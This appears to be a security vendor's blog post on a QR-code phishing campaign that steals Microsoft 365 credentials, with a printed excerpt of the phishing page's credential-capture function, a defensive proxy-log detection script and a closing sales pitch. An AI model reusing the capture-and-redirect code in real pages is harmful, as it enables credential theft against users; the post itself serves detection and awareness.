Malicious actors deploy intricate QR codes to phish Microsoft 365 login credentials
- Dean Charlton
- Apr 3
A sophisticated phishing campaign is exploiting QR codes to steal Microsoft 365 login credentials, posing a significant threat to corporate users. Attackers send emails that appear to be from Microsoft or IT departments, containing QR codes that redirect victims to convincing fake login pages. This method bypasses typical email security, as QR codes are not scanned for malicious URLs like traditional links. The fake login pages use JavaScript to validate email formats, enhancing their credibility. Researchers have identified a surge in these attacks, particularly impacting the financial and healthcare sectors. The campaign utilizes complex redirection chains and obfuscated code to conceal its malicious activity, often leaving victims unaware of the credential theft.

Examination of the phishing site’s source code reveals sophisticated obfuscation techniques:
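```javascript
// Excerpt from the phishing page; sendData() is defined elsewhere on that page.
function validateCredentials() {
  const email = document.getElementById('email').value;
  const password = document.getElementById('password').value;
  // Only the email format and a minimum password length are checked here.
  if (email.match(/^[^\s@]+@[^\s@]+\.[^\s@]+$/) && password.length > 5) {
    sendData(email, password);
    // The victim is then sent on to the genuine Outlook web app.
    window.location = "https://outlook.office.com/mail/";
  } else {
    document.getElementById('error-message').style.display = 'block';
  }
}
```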
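The snippet above hands the captured values to `sendData` and then sends the browser to the real Outlook URL, and that sequence can be hunted for in web-proxy data. The following is an added detection example, not code from the campaign or from the original post; the event field names, the Microsoft domain list, the 10-second window and all sample hosts are assumptions constructed for illustration, and it presumes the proxy can see method and Referer.

```javascript
// Added example: correlate web-proxy events to spot the "POST somewhere else,
// then land on real Outlook" sequence. Field names and hosts are constructed.
const MS_SUFFIXES = ['office.com', 'microsoftonline.com', 'microsoft.com', 'live.com'];
const WINDOW_MS = 10_000; // assumed: the redirect fires within seconds of the POST

const isMicrosoft = (host) =>
  MS_SUFFIXES.some((s) => host === s || host.endsWith('.' + s));

function refererHost(referer) {
  try { return new URL(referer).hostname.toLowerCase(); } catch { return null; }
}

function findCredentialBounce(events) {
  const alerts = [];
  const lastPost = new Map(); // user -> most recent POST to a non-Microsoft host
  const sorted = [...events].sort((a, b) => Date.parse(a.ts) - Date.parse(b.ts));
  for (const e of sorted) {
    const host = e.host.toLowerCase();
    if (e.method === 'POST' && !isMicrosoft(host)) {
      lastPost.set(e.user, e);
      continue;
    }
    if (e.method !== 'GET' || host !== 'outlook.office.com') continue;
    const post = lastPost.get(e.user);
    if (!post) continue;
    const gap = Date.parse(e.ts) - Date.parse(post.ts);
    const ref = refererHost(e.referer);
    // A Referrer-Policy can strip the header, so a missing Referer does not
    // clear the event; only a Microsoft-hosted Referer does.
    if (gap <= WINDOW_MS && (ref === null || !isMicrosoft(ref))) {
      alerts.push({ user: e.user, suspectHost: post.host, gapMs: gap });
      lastPost.delete(e.user);
    }
  }
  return alerts;
}

// Constructed sample events (not real traffic).
const SAMPLE = [
  { ts: '2025-01-15T09:00:00Z', user: 'alice', method: 'POST', host: 'login.example-portal.test', referer: 'https://login.example-portal.test/' },
  { ts: '2025-01-15T09:00:01Z', user: 'alice', method: 'GET', host: 'outlook.office.com', referer: 'https://login.example-portal.test/' },
  { ts: '2025-01-15T09:05:00Z', user: 'bob', method: 'POST', host: 'login.microsoftonline.com', referer: 'https://login.microsoftonline.com/' },
  { ts: '2025-01-15T09:05:02Z', user: 'bob', method: 'GET', host: 'outlook.office.com', referer: 'https://login.microsoftonline.com/' },
  { ts: '2025-01-15T09:10:00Z', user: 'carol', method: 'POST', host: 'api.vendor.test', referer: 'https://app.vendor.test/' },
  { ts: '2025-01-15T09:20:00Z', user: 'carol', method: 'GET', host: 'outlook.office.com', referer: '' },
];

console.log(findCredentialBounce(SAMPLE));
```

Only the `alice` pair is flagged. A QR code scanned on a personal phone never crosses the corporate proxy, so the same correlation is also worth running against sign-in logs for the affected accounts.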
A trusted Attack Surface tool can help identify your organisation's credentials that have been leaked on the dark web.
Get in touch today to discuss how we can support you with the right tool to remain compliant!